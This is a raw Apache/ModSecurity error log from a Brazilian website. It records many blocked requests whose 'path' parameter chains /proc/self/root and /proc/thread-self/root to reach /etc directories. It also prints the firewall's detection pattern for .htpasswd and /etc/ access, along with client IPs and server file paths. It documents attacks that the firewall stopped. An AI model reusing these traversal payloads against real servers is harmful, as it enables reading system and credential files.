https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:42.603062 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:48100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeyta6ubjKNq_cu4aUfAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:44.459511 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:48892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzezPXLqtnMIWvjpaJdvAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:46.854884 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:48902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzezgF0L0L-SsrnPo4uhAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:47.399695 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:48104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzez-oXxyEfFpUF8f9KpAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:49.934737 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:43032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze0fu8EFLIOrSqIpvlZQAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:51.405063 2026] [:error] [pid 30424:tid 140411741927168] [client 74.7.243.128:44184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze0st36Dv4L1GW-s-ehwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:52.994641 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:43040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze1AkwaGbbGflqUZAK9wAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:56.246031 2026] [core:alert] [pid 30077:tid 140411708356352] [client 57.141.18.72:32780] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:44:56.396252 2026] [:error] [pid 30424:tid 140411649607424] [client 74.7.241.31:43052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze2Mt36Dv4L1GW-s-eiwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:58.225695 2026] [:error] [pid 30424:tid 140411683178240] [client 74.7.243.128:44198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze2st36Dv4L1GW-s-ejAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:59.125857 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58062] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:45:00.570350 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:36042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze3AF0L0L-SsrnPo4uiQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:02.680961 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.243.128:47290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze3r-FhjpZGs9ba8qqvAAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:05.083546 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:36054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze4RCii7xarUs8iHYoqAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:06.041574 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:47306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze4ta6ubjKNq_cu4aUjgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:08.095391 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:55910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze5BCii7xarUs8iHYorgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:11.062900 2026] [:error] [pid 30424:tid 140411574073088] [client 74.7.241.31:55912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze58t36Dv4L1GW-s-ekAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:11.644092 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:47316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze5_u8EFLIOrSqIpvldAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:14.802394 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:55926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze6hCii7xarUs8iHYouAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:19.726111 2026] [mime_magic:error] [pid 7235:tid 140411691570944] (70014)End of file found: [client 57.141.18.76:33378] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:45:19.948284 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.241.31:41536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze7_XLqtnMIWvjpaJdzwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:24.129816 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58754] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:45:25.559043 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:41546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze9fXLqtnMIWvjpaJd1AAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:45:26.675370 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:48048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze9ta6ubjKNq_cu4aUpAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:45:30.007832 2026] [:error] [pid 8307:tid 140411699963648] [client 74.7.241.31:47432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abze-r-FhjpZGs9ba8qqyQAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
